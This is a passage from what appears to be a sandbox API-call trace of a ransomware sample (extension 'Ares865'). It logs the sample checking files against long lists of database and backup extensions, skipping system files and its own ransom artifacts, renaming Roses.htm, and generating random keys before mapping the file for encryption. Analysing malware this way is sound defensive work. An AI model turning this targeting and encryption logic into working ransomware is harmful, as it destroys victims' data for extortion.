lpString2="ask") returned 1 [0063.605] lstrlenW (lpString="btr") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.605] lstrlenW (lpString="cat") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.605] lstrlenW (lpString="cdb") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.605] lstrlenW (lpString="ckp") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.605] lstrlenW (lpString="cma") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.605] lstrlenW (lpString="cpd") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.605] lstrlenW (lpString="dacpac") returned 6 [0063.605] lstrcmpiW (lpString1="es.htm", lpString2="dacpac") returned 1 [0063.605] lstrlenW (lpString="dad") returned 3 [0063.605] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.605] lstrlenW (lpString="dadiagrams") returned 10 [0063.606] lstrlenW (lpString="daschema") returned 8 [0063.606] lstrcmpiW (lpString1="oses.htm", lpString2="daschema") returned 1 [0063.606] lstrlenW (lpString="db-journal") returned 10 [0063.606] lstrlenW (lpString="db-shm") returned 6 [0063.606] lstrcmpiW (lpString1="es.htm", lpString2="db-shm") returned 1 [0063.606] lstrlenW (lpString="db-wal") returned 6 [0063.606] lstrcmpiW (lpString1="es.htm", lpString2="db-wal") returned 1 [0063.606] lstrlenW (lpString="dbc") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.606] lstrlenW (lpString="dbs") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.606] lstrlenW (lpString="dbt") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.606] lstrlenW (lpString="dbv") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.606] lstrlenW (lpString="dbx") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.606] lstrlenW (lpString="dcb") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.606] lstrlenW (lpString="dct") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.606] lstrlenW (lpString="dcx") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.606] lstrlenW (lpString="ddl") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.606] lstrlenW (lpString="dlis") returned 4 [0063.606] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.606] lstrlenW (lpString="dp1") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.606] lstrlenW (lpString="dqy") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.606] lstrlenW (lpString="dsk") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.606] lstrlenW (lpString="dsn") returned 3 [0063.606] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.606] lstrlenW (lpString="dtsx") returned 4 [0063.607] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.607] lstrlenW (lpString="dxl") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.607] lstrlenW (lpString="eco") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.607] lstrlenW (lpString="ecx") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.607] lstrlenW (lpString="edb") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.607] lstrlenW (lpString="epim") returned 4 [0063.607] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.607] lstrlenW (lpString="fcd") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.607] lstrlenW (lpString="fdb") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.607] lstrlenW (lpString="fic") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.607] lstrlenW (lpString="flexolibrary") returned 12 [0063.607] lstrlenW (lpString="fm5") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.607] lstrlenW (lpString="fmp") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.607] lstrlenW (lpString="fmp12") returned 5 [0063.607] lstrcmpiW (lpString1="s.htm", lpString2="fmp12") returned 1 [0063.607] lstrlenW (lpString="fmpsl") returned 5 [0063.607] lstrcmpiW (lpString1="s.htm", lpString2="fmpsl") returned 1 [0063.607] lstrlenW (lpString="fol") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.607] lstrlenW (lpString="fp3") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.607] lstrlenW (lpString="fp4") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.607] lstrlenW (lpString="fp5") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.607] lstrlenW (lpString="fp7") returned 3 [0063.607] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.607] lstrlenW (lpString="fpt") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.608] lstrlenW (lpString="frm") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.608] lstrlenW (lpString="gdb") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.608] lstrlenW (lpString="gdb") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.608] lstrlenW (lpString="grdb") returned 4 [0063.608] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.608] lstrlenW (lpString="gwi") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.608] lstrlenW (lpString="hdb") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.608] lstrlenW (lpString="his") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.608] lstrlenW (lpString="ib") returned 2 [0063.608] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.608] lstrlenW (lpString="idb") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.608] lstrlenW (lpString="ihx") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.608] lstrlenW (lpString="itdb") returned 4 [0063.608] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.608] lstrlenW (lpString="itw") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.608] lstrlenW (lpString="jet") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.608] lstrlenW (lpString="jtx") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.608] lstrlenW (lpString="kdb") returned 3 [0063.608] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.608] lstrlenW (lpString="kexi") returned 4 [0063.608] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.608] lstrlenW (lpString="kexic") returned 5 [0063.608] lstrcmpiW (lpString1="s.htm", lpString2="kexic") returned 1 [0063.608] lstrlenW (lpString="kexis") returned 5 [0063.609] lstrcmpiW (lpString1="s.htm", lpString2="kexis") returned 1 [0063.609] lstrlenW (lpString="lgc") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.609] lstrlenW (lpString="lwx") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.609] lstrlenW (lpString="maf") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.609] lstrlenW (lpString="maq") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.609] lstrlenW (lpString="mar") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.609] lstrlenW (lpString="marshal") returned 7 [0063.609] lstrcmpiW (lpString1="ses.htm", lpString2="marshal") returned 1 [0063.609] lstrlenW (lpString="mas") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.609] lstrlenW (lpString="mav") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.609] lstrlenW (lpString="maw") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.609] lstrlenW (lpString="mdbhtml") returned 7 [0063.609] lstrcmpiW (lpString1="ses.htm", lpString2="mdbhtml") returned 1 [0063.609] lstrlenW (lpString="mdn") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.609] lstrlenW (lpString="mdt") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.609] lstrlenW (lpString="mfd") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.609] lstrlenW (lpString="mpd") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.609] lstrlenW (lpString="mrg") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.609] lstrlenW (lpString="mud") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.609] lstrlenW (lpString="mwb") returned 3 [0063.609] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.609] lstrlenW (lpString="myd") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.610] lstrlenW (lpString="ndf") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.610] lstrlenW (lpString="nnt") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.610] lstrlenW (lpString="nrmlib") returned 6 [0063.610] lstrcmpiW (lpString1="es.htm", lpString2="nrmlib") returned -1 [0063.610] lstrlenW (lpString="ns2") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.610] lstrlenW (lpString="ns3") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.610] lstrlenW (lpString="ns4") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.610] lstrlenW (lpString="nsf") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.610] lstrlenW (lpString="nv") returned 2 [0063.610] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.610] lstrlenW (lpString="nv2") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.610] lstrlenW (lpString="nwdb") returned 4 [0063.610] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.610] lstrlenW (lpString="nyf") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.610] lstrlenW (lpString="odb") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.610] lstrlenW (lpString="odb") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.610] lstrlenW (lpString="oqy") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.610] lstrlenW (lpString="ora") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.610] lstrlenW (lpString="orx") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.610] lstrlenW (lpString="owc") returned 3 [0063.610] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.610] lstrlenW (lpString="p96") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.611] lstrlenW (lpString="p97") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.611] lstrlenW (lpString="pan") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.611] lstrlenW (lpString="pdb") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.611] lstrlenW (lpString="pdm") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.611] lstrlenW (lpString="pnz") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.611] lstrlenW (lpString="qry") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.611] lstrlenW (lpString="qvd") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.611] lstrlenW (lpString="rbf") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.611] lstrlenW (lpString="rctd") returned 4 [0063.611] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.611] lstrlenW (lpString="rod") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.611] lstrlenW (lpString="rodx") returned 4 [0063.611] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.611] lstrlenW (lpString="rpd") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.611] lstrlenW (lpString="rsd") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.611] lstrlenW (lpString="sas7bdat") returned 8 [0063.611] lstrcmpiW (lpString1="oses.htm", lpString2="sas7bdat") returned -1 [0063.611] lstrlenW (lpString="sbf") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.611] lstrlenW (lpString="scx") returned 3 [0063.611] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.611] lstrlenW (lpString="sdb") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.612] lstrlenW (lpString="sdc") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.612] lstrlenW (lpString="sdf") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.612] lstrlenW (lpString="sis") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.612] lstrlenW (lpString="spq") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.612] lstrlenW (lpString="te") returned 2 [0063.612] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.612] lstrlenW (lpString="teacher") returned 7 [0063.612] lstrcmpiW (lpString1="ses.htm", lpString2="teacher") returned -1 [0063.612] lstrlenW (lpString="tmd") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.612] lstrlenW (lpString="tps") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.612] lstrlenW (lpString="trc") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.612] lstrlenW (lpString="trc") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.612] lstrlenW (lpString="trm") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.612] lstrlenW (lpString="udb") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.612] lstrlenW (lpString="udl") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.612] lstrlenW (lpString="usr") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.612] lstrlenW (lpString="v12") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.612] lstrlenW (lpString="vis") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.612] lstrlenW (lpString="vpd") returned 3 [0063.612] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.612] lstrlenW (lpString="vvv") returned 3 [0063.613] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.613] lstrlenW (lpString="wdb") returned 3 [0063.613] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.613] lstrlenW (lpString="wmdb") returned 4 [0063.613] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.613] lstrlenW (lpString="wrk") returned 3 [0063.613] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.613] lstrlenW (lpString="xdb") returned 3 [0063.613] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.613] lstrlenW (lpString="xld") returned 3 [0063.613] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.613] lstrlenW (lpString="xmlff") returned 5 [0063.613] lstrcmpiW (lpString1="s.htm", lpString2="xmlff") returned -1 [0063.613] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.Ares865") returned 88 [0063.613] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\roses.htm.ares865"), dwFlags=0x1) returned 1 [0063.621] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\roses.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.622] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=233) returned 1 [0063.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.622] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.622] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.623] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.623] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.624] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.626] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.626] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.627] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.627] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.628] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.628] CloseHandle (hObject=0x164) returned 1 [0063.628] CloseHandle (hObject=0x154) returned 1 [0063.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.628] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x649d3c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x649d3c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa567585, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="aoldtz.exe") returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2=".") returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="..") returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="windows") returned -1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="bootmgr") returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="temp") returned -1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="pagefile.sys") returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="boot") returned 1 [0063.628] lstrcmpiW (lpString1="Roses.jpg", lpString2="ids.txt") returned 1 [0063.629] lstrcmpiW (lpString1="Roses.jpg", lpString2="ntuser.dat") returned 1 [0063.629] lstrcmpiW (lpString1="Roses.jpg", lpString2="perflogs") returned 1 [0063.629] lstrcmpiW (lpString1="Roses.jpg", lpString2="MSBuild") returned 1 [0063.629] lstrlenW (lpString="Roses.jpg") returned 9 [0063.629] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 80 [0063.629] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Roses.jpg" | out: lpString1="Roses.jpg") returned="Roses.jpg" [0063.629] lstrlenW (lpString="Roses.jpg") returned 9 [0063.629] lstrlenW (lpString="Ares865") returned 7 [0063.629] lstrcmpiW (lpString1="ses.jpg", lpString2="Ares865") returned 1 [0063.629] lstrlenW (lpString=".dll") returned 4 [0063.629] lstrcmpiW (lpString1="Roses.jpg", lpString2=".dll") returned 1 [0063.629] lstrlenW (lpString=".lnk") returned 4 [0063.629] lstrcmpiW (lpString1="Roses.jpg", lpString2=".lnk") returned 1 [0063.629] lstrlenW (lpString=".ini") returned 4 [0063.629] lstrcmpiW (lpString1="Roses.jpg", lpString2=".ini") returned 1 [0063.629] lstrlenW (lpString=".sys") returned 4 [0063.629] lstrcmpiW (lpString1="Roses.jpg", lpString2=".sys") returned 1 [0063.629] lstrlenW (lpString="Roses.jpg") returned 9 [0063.629] lstrlenW (lpString="bak") returned 3 [0063.629] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.629] lstrlenW (lpString="ba_") returned 3 [0063.629] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.629] lstrlenW (lpString="dbb") returned 3 [0063.629] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.629] lstrlenW (lpString="vmdk") returned 4 [0063.629] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.629] lstrlenW (lpString="rar") returned 3 [0063.629] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.629] lstrlenW (lpString="zip") returned 3 [0063.629] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.629] lstrlenW (lpString="tgz") returned 3 [0063.629] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.629] lstrlenW (lpString="vbox") returned 4 [0063.629] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.629] lstrlenW (lpString="vdi") returned 3 [0063.629] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.630] lstrlenW (lpString="vhd") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.630] lstrlenW (lpString="vhdx") returned 4 [0063.630] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.630] lstrlenW (lpString="avhd") returned 4 [0063.630] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.630] lstrlenW (lpString="db") returned 2 [0063.630] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.630] lstrlenW (lpString="db2") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.630] lstrlenW (lpString="db3") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.630] lstrlenW (lpString="dbf") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.630] lstrlenW (lpString="mdf") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.630] lstrlenW (lpString="mdb") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.630] lstrlenW (lpString="sql") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.630] lstrlenW (lpString="sqlite") returned 6 [0063.630] lstrcmpiW (lpString1="es.jpg", lpString2="sqlite") returned -1 [0063.630] lstrlenW (lpString="sqlite3") returned 7 [0063.630] lstrcmpiW (lpString1="ses.jpg", lpString2="sqlite3") returned -1 [0063.630] lstrlenW (lpString="sqlitedb") returned 8 [0063.630] lstrcmpiW (lpString1="oses.jpg", lpString2="sqlitedb") returned -1 [0063.630] lstrlenW (lpString="xml") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.630] lstrlenW (lpString="$er") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.630] lstrlenW (lpString="4dd") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.630] lstrlenW (lpString="4dl") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.630] lstrlenW (lpString="^^^") returned 3 [0063.630] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.630] lstrlenW (lpString="abs") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.631] lstrlenW (lpString="abx") returned 3 [0063.631] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.631] lstrlenW (lpString="accdb") returned 5 [0063.631] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0063.631] lstrlenW (lpString="accdc") returned 5 [0063.631] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0063.631] lstrlenW (lpString="accde") returned 5 [0063.631] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0063.631] lstrlenW (lpString="accdr") returned 5 [0063.631] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0063.631] lstrlenW (lpString="accdt") returned 5 [0063.631] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0063.631] lstrlenW (lpString="accdw") returned 5 [0063.631] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0063.631] lstrlenW (lpString="accft") returned 5 [0063.631] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0063.631] lstrlenW (lpString="adb") returned 3 [0063.631] 